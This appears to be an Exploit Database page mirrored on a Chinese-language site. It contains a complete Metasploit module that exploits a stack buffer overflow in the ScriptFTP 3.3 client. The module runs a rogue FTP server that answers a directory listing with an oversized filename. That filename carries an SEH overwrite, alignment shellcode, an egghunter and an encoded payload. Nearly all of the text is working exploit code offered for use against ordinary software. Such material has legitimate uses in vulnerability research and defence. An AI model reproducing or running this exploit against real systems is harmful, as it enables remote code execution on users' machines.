ScriptFTP 3.3 – Remote Buffer Overflow (Metasploit)

• Exploit Database
• 117 阅读

• 作者： otoy
  日期： 2011-09-29
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17904/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169

  #Exploit Title: ScriptFTP 3.3 Remote Buffer Overflow (MSF) #Date: Sept 20 2011 #Author: otoy #Version: 3.3 #Tested on: Windows XP SP3 #CVE : - #EDB-ID: 17876 #Thanks: cyb3r.anbu, spentera-team, dE-team, offsec, exploit-db, corelanc0d3r     class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking   include Exploit::Remote::FtpServer   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;ScriptFTP 3.3 Remote Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a stack buffer overflow in ScriptFTP 3.3 ftp client. The overflow is triggered when the client connects to a FTP server which sends an overly long directory and filename in response to a GETLIST command.   This will cause an access violation, and will eventually overwrite the saved extended instruction pointer. }, &apos;Author&apos; => [ &apos;modpr0be&apos;, # Original bug &apos;Cyberheb&apos;, # porting from poc to msf &apos;Otoy&apos;, # final msf module ], &apos;License&apos;=> MSF_LICENSE, &apos;Version&apos;=> "0", &apos;References&apos; => [ [ &apos;OSVDB&apos;, &apos;75633&apos;], [ &apos;URL&apos;, &apos;http://www.digital-echidna.org/2011/09/scriptftp-3-3-remote-buffer-overflow-exploit-0day/&apos; ], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;thread&apos;, }, &apos;Payload&apos;=> { &apos;Space&apos;=> 1000, &apos;DisableNops&apos; => true, &apos;EncoderType&apos; => Msf::Encoder::Type::AlphanumMixed, &apos;BadChars&apos;=>"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x2F\x5c\x3c\x3e\x5e\x7e", &apos;EncoderOptions&apos; => { &apos;BufferRegister&apos; => &apos;EDX&apos;, } }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Windows XP Universal&apos;, { &apos;Ret&apos; => "\x45\x5B", &apos;Offset&apos; => 1746 } ], ], &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => &apos;Sept 20 2011&apos;, &apos;DefaultTarget&apos;=> 0))   end   def setup super end   def on_client_unknown_command(c,cmd,arg) c.put("200 OK\r\n") end     #Unicode Encoder def get_unicode_payload(p) encoder = framework.encoders.create("x86/unicode_upper") encoder.datastore.import_options_from_hash( {&apos;BufferRegister&apos;=>&apos;EAX&apos;} ) unicode_payload = encoder.encode(p, nil, nil, platform) return unicode_payload end     def on_client_command_list(c,arg) conn = establish_data_connection(c) if(not conn) c.put("425 Can&apos;t build data connection\r\n") return end print_status(" - Data connection set up") code = 150 c.put("#{code} Here comes the directory listing.\r\n") code = 226 c.put("#{code} Directory send ok.\r\n")     sampahawal = "A" * 1746 nseh = "\x61\x62" seh = target[&apos;Ret&apos;] sampahbawah = 1250   #prepare for align align = "\x60"#pushad align << "\x73" #nop/align align << "\x53" #push ebx align << "\x73" #nop/align align << "\x58" #pop eax align << "\x73" #nop/align align << "\x05\x02\x11" #add eax,0x11000200 align << "\x73" #nop/align align << "\x2d\x01\x11" #sub eax,0x11000120 align << "\x73" #nop/align   #align after egg align2 = "\x73\x57\x73\x58\x73" #nop/push edi/nop/pop eax/nop align2 << "\xb9\x1b\xaa"#mov ecx,0xaa001b00 align2 << "\xe8\x73"#add al,ch + nop align2 << "\x50\x73\xc3"#push eax,nop,ret   #walking walk = "\x50" #push eax walk << "\x73"#nop/align walk << "\xc3"#ret   #egghunter egghunter = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA" egghunter << "IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5" egghunter << "8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB" egghunter << "ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1" egghunter << "HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O" egghunter << "SEYWKOYWA"   #junk sampah1 = "\x44" * 106 + "\x73" sampah2 = "\x42" * 544   #egg telur = "0t0t" #payload stubget = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35" palpha = stubget + payload.encoded puni = get_unicode_payload(palpha) #filename filename = sampahawal filename << nseh filename << seh filename << align filename << walk filename << sampah1 filename << egghunter filename << sampah2 filename << telur filename << align2 filename << puni filename << sampah1   print_status(" - Sending directory list via data connection") dirlist = "-rwxrwxrwx1 1000 11111 Jun 11 21:10 #{filename}.txt\r\n" dirlist << "drwxrwxrwx1 1000 11111 Jun 11 21:10 #{filename}\r\n" dirlist << "-rwxrwxrwx1 1000 11111 Jun 11 21:10 #{filename}.txt\r\n" conn.put(dirlist) conn.close return end   end